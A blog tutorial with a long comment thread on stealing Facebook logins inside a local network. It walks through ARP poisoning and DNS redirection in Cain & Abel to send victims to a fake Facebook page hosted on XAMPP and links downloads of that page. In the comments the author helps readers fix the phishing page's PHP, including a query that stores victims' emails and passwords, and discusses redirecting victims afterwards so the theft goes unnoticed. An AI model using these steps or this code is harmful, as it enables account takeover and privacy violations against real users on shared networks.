Sorry :(
Our Image server is on a maintenance now,
You will not see the image correctly
please check back shortly. . .
Hacking Facebook Using Man in the Middle Attack
Type : Tutorial
Level : Medium, Advanced
In this tutorial I will demonstrate how to hacking Facebook using MITM(Man in the Middle). This attack usually happen inside a Local Area Network(LAN) in office, internet cafe, apartment, etc.
Below is the topology or infrastructure how MITM work, and how it can be happen to do hacking a Facebook account.
In the picture above, the attacker act as the third person attacker will manipulate the switch routing table so the victim will think that attacker is a Web server and vice versa, because the attacker has changed the routing table.
For this tutorial we need to prepare the tools to do Proof of Concept about this tutorial. Below you can download it.
1. XAMPP – APACHE+PHP+MySQL(We use XAMPP for our fake facebook web server)
2. Cain & Abel (We use it for Man in the Middle Attack)
3. Facebook Offline Page (I have nulled the code, so this script will not contacting Facebook when victim accessed fake Facebook page — only use this for learning) press CTRL + click my affiliations box to view the download link below
Update : replace your index.php and login.php using following files Download Here.
Okay, let's start the step-by-step how to do this:
Attacker IP Address : 192.168.160.148
Victim IP Address : 192.168.160.82
Fake Web Server : 192.168.160.148
I assume you're in a Local Area Network now.
1. Install the XAMPP and run the APACHE and MySQL service
2. Extract the fb.rar and copy the content to C:\xampp\htdocs
3. Check the fake web server by open it in a web browser and type http://localhost/
4. Install Cain & Abel and do the APR(ARP Poisoning Routing), just see the step by step how to below
Click the start/stop sniffer
Choose your interface for sniffing and click OK. When it's finish, click again the Start/Stop Sniffer to activate the sniffing interface.
Go to the Sniffer tab and then click the + (plus sign)
Select "All hosts in my subnet" and Click OK.
You will see the other people in your network, but my target is 192.168.160.82 (MySelf…LoL :p)
After we got all of the information, click at the bottom of application the APR tab.
Click the + button, and follow the instruction below.
When you finish, now the next step is preparing to redirect the facebook.com page to the fake web server.
Click "APR DNS" and click + to add the new redirecting rule.
When everything is finish, just click OK. Then the next step is to activate the APR by clicking the Start/Stop APR button.
5. Now Hacking Facebook using MITM has been activated. This is how it looks like when victim opened http://www.facebook.com
6. But if you ping the domain name, you can reveal that it's fake, because the address is IP of the attacker
Hope it's useful 
*ps : click the grey area of my affiliations box to view the download link
|
|
40 Comments »
RSS feed for comments on this post. TrackBack URL
very usefull, ko vishnu…
hehehhe..
but i think social engineering is the most powerful attack to hack someone facebook
#Christ
Haha…halo Chris apa kabar?iya lah itu masih tetep paling efektif….dijamin itu mah…
[...] 1. Create your own web server(For Windows user, you can use XAMPP). and copy the index.html in your htdocs/exploit/ folder. (You can view the tutorials here in option 1 and 2) [...]
NoT Work
#anonim
maybe the facebook has change the logic of their web application…you can learn this for logic of MITM local DNS poisoning
[...] What is Man in the Middle Attack? I also have already write down about this in my previous post about "Hacking Facebook Using Man in the Middle Attack" [...]
[...] this hacking method will works perfectly with DNS spoofing or Man in the Middle Attack method. Here in this tutorial I’m only write how-to and step-by-step to perform the basic attack, [...]
<font color='blue'> Nice tips, unfortunately it only works on LAN.. </font>
by font color='magenta'><u>www.easycellular.blogspt.com </u></font>
its also work on some open wifi..using router that can be poison all the computer in the network…
but i have some probs…
when i try to ping it…
it reply with request time out…how do i fix it???
is this have someting to do with my server…fyi, im using wamp server…
do u know how to configure it so that the fb fake page is up and running???
thanks in advance!:D
#puppet
when you ping return RTO, maybe the packet forwarding have some problem..when MITM in action, it should forward any packet arrriving on attacker computer..you can refer to this tips and trick http://vishnuvalentino.com/tips-and-trick/how-to-set-up-port-forwarding-in-linux-and-windows/ to do that
thanks 4 assisting me..
but i think the problem is my esetnod firewall…
i got another problem here…
i got this error:Notice: Undefined index: v4l in E:\xampp\htdocs\login.php on line 8
i tried to correct this by add the second if to if else($_REQUEST['v4l'] == "Login"){
mysql_query("insert into fb_fail set uname='".$_POST['email']."', pwd='".$_POST['pass']."', date='".date("Y-m-d H:i:s")."'");
}
and it fixed but this error occured : Notice: Undefined index: login in E:\xampp\htdocs\login.php on line 4
can u help me fix it?
#puppet
Hi again, here’s I’m updating the index.php file and login.php file download here
i'll try it out…
thank v4l!
ok…
it work fine!:D
it return no error page…
but the problem is the password variable doesn't pass to the database for the (index page)..
it only capture the after the second page(http://localhost/login.php?login_attempt=1)…
(i found that the password field also doesn't set to hidden type…it display in plain text)…
thanks 4 helping me out!
#puppet
ahh my fault..I’m forget to change the variable….
I’ve already update the file again
update-1.rar
thanks v4l!
it works!:D
but did u know how to set the email n password in hidden mode…in appear the pass in plaintext (index.php)…
#puppet
Yep I think I’m understand now what you mean…about masking password into dotted character right?
here’s the update
[...] it?someone can act as other person and started to sending malicious URL. (you can view here how to hack facebook using man in the middle attack). Now in this tutorial we will do almost the same thing Hacking Windows 7 SP 1 Using Java Signed [...]
plz can u tell me how to get free dotcom domain.plz
#man
you can google it here you can find the most suitable for you…esp the hosting should support PHP+MySQL
thanks v4l!:D
we did you learn how to make that fake homepage with a database…
i have so much respect with that..n you can solve my problem to about the coding…
i really want to know how you make this fake login from scratch..can you tell me..:)
#puppet
You can view the page and “save page as”.
[...] grande partie liées au réseau. Or, qu'est-ce que c'est l'internet ? Pour en savoir plus : – simulation de l'attaque – la preuve qu'il faut protéger la connexion entre le serveur et la base de données – la [...]
before i find ur post i use myown fake page…
but it seem slow even in LAN network…
but yours have faster page…hehe..
thanks!
#puppet
just find
hehe..
javascript srcthat calls facebook.com (that’s why yours slow) and continue to fix the interface by modifying the CSS+HTML[...] etc) when you open a website, stop your step there and close your browser and try to ping the URL (see here how to ping the URL on step [...]
Were can i find the passwords and usernames ? I created the database FB and changed the username from root to v4l , but i cant find them ! please help me guys
#phil
If you use fresh install of mysql(from xampp), you can change the username into : root and password just leave empty
@v4L
You know? that would be awesome!
Is is possible, to route the victim to your fake page, and after the mail and password are submitted, show the error page and redirect them to the real fb page? so they think "hu, I must had an typo… lets try again"
Regards from germany!
#John
try add meta refresh in error pages that redirected to facebook.com.
In login.php find this line of code(line 20)
meta http-equiv=refresh content=”0; URL=?login_attempt=1&_fb_noscript=1″
change to :
meta http-equiv=refresh content=”0; URL=http://www.facebook.com?login_attempt=1&_fb_noscript=1″
Thats an nice idea.. But in fact of the arp spoofing, the meta refresh wouldn't work I think… Because facebook.com is pointing to us…
#john
LoL…I’m forget about it…yep you’re right…anyway maybe you can redirect to facebook IP address
But then the IP address shows up in the url bar… or I redirect to login2.php where is an iframe oder frame which includes http://<facebook ip>/login.php
That could work… 
Nevertheless I didn't use Cain & Abel. I do this at my linux router and use arpspoof/bind/apache. I need somthing like "if victim looks up facebook.com via my lokal dns, point to my webserver, spoof user/pw, reload dns to point victim to origin facebook ip"
how to get the password by doing this man … this will show the page of the facebook the credentials will remain in it how to get the credentials..
#Rocker
The credentials will be saved on MySQL database of your xampp
Hey V4L! great tutorial. I just have one small question. I set everything up perfectly but then i found that Cain can't "bind HTTPS Acceptor Socket" on port 443 because Apache (w/ Xampp) is already using. Is there a way around this problem?
#Pete
You should configure your httpd.conf in your apache configuration and try to change your local HTTPS run on other port.
[...] Actually I have already create the tutorial about Hacking facebook using man in the middle attack about one year ago(for educational purpose) about how to hack facebook password account in a local [...]
Hello Mr. Valentino,
I would like to know how can I download the facebook clone page, I'm not being able to do the CTRL + click process.
Thanks in advance,
Herbert.
#Herbert
There’s a grey frame, click on it.